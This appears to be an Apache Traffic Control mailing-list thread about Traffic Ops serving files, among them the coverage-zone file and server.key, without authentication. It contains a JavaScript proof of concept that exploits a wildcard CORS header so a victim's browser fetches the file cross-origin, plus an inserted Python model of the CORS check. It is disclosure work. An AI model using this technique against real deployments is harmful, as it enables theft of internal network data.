Posted to dev@trafficcontrol.apache.org by Nir Ichye <ni...@qwilt.com> on 2017/09/19 07:52:49 UTC

Public resources in Traffic Ops

Hi,

It seems that several files in TO can be accessed without credentials. This
includes:
- Coverage Zone File (http[s]://<opsDomain>/routing/coverage-zone.json)
- server.key (http[s]://<opsDomain>/routing/server.key)
- and other files in the public folder.

Can you tell if the files are public on purpose and if this could be a
security issue?

Thanks,
Nir.

Re: Public resources in Traffic Ops

Posted by Rawlin Peters <ra...@gmail.com>.
Hey Nir,

At least for the CZF, it's really not necessary to have that in the
'public' directory at all, because TRs just retrieve it from the URL
configured in Traffic Ops anyways. I don't know the history of why it
was put in the 'public' directory in the first place, but it's
definitely not necessary now because the URL is configured via Traffic
Ops and doesn't have to be on the TO server itself:

In the TR profile, add the following param:
parameter name: coveragezone.polling.url
config file name: CRConfig.json
value: a URL for the CZF

Using that parameter you could serve the CZF on a separate server with
ACLs that only allow access from your TRs. But if we want to put the
CZF behind some kind of real authentication (other than basic auth in
the URL), then we'd have to build that functionality into TR.

- Rawlin
On Mon, Jul 23, 2018 at 8:16 AM Nir Ichye <ni...@qwilt.com> wrote:

Re: Public resources in Traffic Ops

Posted by Nir Ichye <ni...@qwilt.com>.
Sorry for bringing this thread from the dead, but I think that it is still
exploitable.

Even if ops is protected by an ACL, an attacker could use JS code to access
it on behalf of a user who has access to OPS.

I've made a proof of concept to show that an attacker can fetch the czf
file from ops.
This is possible both because the resource requires no authentication and
since ops returns "Access-Control-Allow-Origin: *" which allows any host to
gain access to these resources.

To try it yourself, paste the following content into an HTML file and open it in
your browser. You should change "ops-host" to your ops hostname.
To exploit this, an attacker should send a link with this code to someone
who is whitelisted in the ACL.

<html>
<body>
<script>
// Cross-origin GET for the CZF; the browser lets the page read the body
// because TO answers with "Access-Control-Allow-Origin: *".
var czfUrl = "https://ops-host/coverage-zone.json";

function loadDoc(url, divId) {
  var xhttp = new XMLHttpRequest();
  xhttp.onreadystatechange = function() {
    if (this.readyState == 4 && this.status == 200) {
      document.getElementById(divId).innerHTML = this.responseText;
    }
  };
  xhttp.open("GET", url, true);
  xhttp.send();
}
loadDoc(czfUrl, "czf");

</script>
<div id="czf"></div>
</body>
</html>
*---*
*Nir Ichye*
Qwilt | Work: +972-72-2221675 | Mobile: +972-54-7630105 | niri@qwilt.com
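As an added illustration (not part of this thread and not Traffic Ops code), the following models the browser CORS read check that the PoC above relies on and runs it over constructed responses: the behaviour reported in this message (200 plus "Access-Control-Allow-Origin: *"), the same file with no ACAO header, and a response from an authentication layer put in front of TO. The origin and all header values are constructed samples; the PoC needs both "no authentication" and "cross-origin readable" to hold at once.

```python
from dataclasses import dataclass, field

@dataclass
class Response:
    status: int
    headers: dict = field(default_factory=dict)

def header(resp, name):
    # Header names are case-insensitive; the value is returned as-is.
    for k, v in resp.headers.items():
        if k.lower() == name.lower():
            return v
    return None

def cross_origin_readable(resp, page_origin, with_credentials=False):
    """Can a script on page_origin read resp's body? (browser CORS rule for a GET)
    - ACAO "*" opens the body to every origin, but only for credential-less requests
    - otherwise ACAO must equal page_origin exactly, and a credentialed request
      additionally needs Access-Control-Allow-Credentials: true"""
    acao = header(resp, "Access-Control-Allow-Origin")
    if acao is None:
        return False
    if acao == "*":
        return not with_credentials
    if acao != page_origin:
        return False
    if with_credentials:
        return (header(resp, "Access-Control-Allow-Credentials") or "").lower() == "true"
    return True

def assess(resp, page_origin):
    """Audit view of a TO public-folder response fetched with no credentials.
    Returns (unauthenticated, readable, exploitable): a 200 to a credential-less
    probe means no auth was required; the PoC works only when both flags hold."""
    unauthenticated = resp.status == 200
    readable = cross_origin_readable(resp, page_origin)
    return unauthenticated, readable, unauthenticated and readable

# Constructed sample responses; ATTACKER_ORIGIN is a placeholder, not a real host.
ATTACKER_ORIGIN = "https://attacker.invalid"
CURRENT = Response(200, {"Content-Type": "application/json",
                         "Access-Control-Allow-Origin": "*"})   # as reported in the thread
NO_ACAO = Response(200, {"Content-Type": "application/json"})   # file served without any ACAO
AUTHED = Response(401, {"WWW-Authenticate": 'Basic realm="to"',
                        "Access-Control-Allow-Origin": "*"})    # auth layer in front of TO

if __name__ == "__main__":
    for name, r in (("current", CURRENT), ("no-acao", NO_ACAO), ("auth", AUTHED)):
        print(name, assess(r, ATTACKER_ORIGIN))
```

Note that with `with_credentials=True` the wildcard no longer passes, which is why the ACL-only setup is the one the PoC can reach: the whitelisted user's browser sends no credentials and the IP ACL is satisfied by the user's address.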


On Tue, Sep 19, 2017 at 4:55 PM Dave Neuman <ne...@apache.org> wrote:

Re: Public resources in Traffic Ops

Posted by Dave Neuman <ne...@apache.org>.
Anything in the "public" directory is made public so that other components
(like Traffic Router) can get to it without authentication.
It is recommended that you have some ACLs in front of Traffic Ops to limit
who/what can access it.



On Tue, Sep 19, 2017 at 1:52 AM, Nir Ichye <ni...@qwilt.com> wrote: